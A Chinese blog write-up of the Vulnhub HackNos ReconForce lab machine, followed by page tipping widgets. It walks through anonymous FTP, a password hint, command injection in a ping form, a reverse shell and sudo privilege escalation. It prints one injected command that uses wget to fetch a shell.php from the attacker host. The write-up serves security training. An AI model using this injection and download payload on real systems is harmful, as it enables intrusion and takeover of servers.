Vulnhub靶机Reconforce渗透

靶机介绍
官方下载地址:http://www.vulnhub.com/entry/hacknos-reconforce-v11,416/
这个靶机有两个flag,难度是中级
在这里插入图片描述
运行环境
靶机:网络设为桥接,IP地址:192.168.1.89
攻击机:同网段下的kali linux,IP地址:192.168.1.37
开始渗透
将靶机运行起来
在这里插入图片描述
获取靶机IP地址
在这里插入图片描述
在这里插入图片描述
扫描端口及其服务
在这里插入图片描述
这里获取了21端口是允许ftp登录的 而且是允许Anonymous登录的
22端口是ssh服务,密钥加密方式是rsa,80端口是apache的web服务
我们这里先尝试使用ftp登录
在这里插入图片描述
这里获取了提示Security@hackNos可能是一个用户名或者密码
查看当前文件夹没有任何东西,而且也没法切换其他目录
开始访问web服务,
在这里插入图片描述
点击TroublesShoot弹出一个登录页面
在这里插入图片描述
尝试弱密码无法登录,最终使用frp提示的Security@hackNos作为admin用户的密码登录成功
在这里插入图片描述
发现是一个命令执行的页面,127.0.0.1可以执行成功
在这里插入图片描述
加上管道符和ls,可以查看当前文件夹下面的内容
在这里插入图片描述
在这里插入图片描述
查看out.php内容,过滤掉了一些特殊字符
在这里插入图片描述
可以执行系统命令就可以使用wget或者curl将反弹shell的php文件或者木马下载到当前的文件夹下
执行 127.0.0.1|wget http://192.168.1.370:8080/shell.php 没有回显任何东西
执行127.0.0.1|ls查看一下
在这里插入图片描述
shell.php下载成功,开启监听,并访问shell.php
在这里插入图片描述
反弹成功,使用python开启一个终端
在这里插入图片描述
查看所有用户
在这里插入图片描述
尝试先提取到recon,查看recon用户的文件,查看Linux版本都没有找到可以利用的信息
最后使用ftp提示的密码,切换到了recon用户
在这里插入图片描述
在recon用户的家目录里面找到了第一个flag
在这里插入图片描述
知道了recon用户的密码,提权就简单很多了,直接使用sudo就可以了
在这里插入图片描述
成功提权到root,切换到root目录,查看最后一个flag
在这里插入图片描述
两个flag都已经找到了,这个靶机也就渗透成功了!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sword-豪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值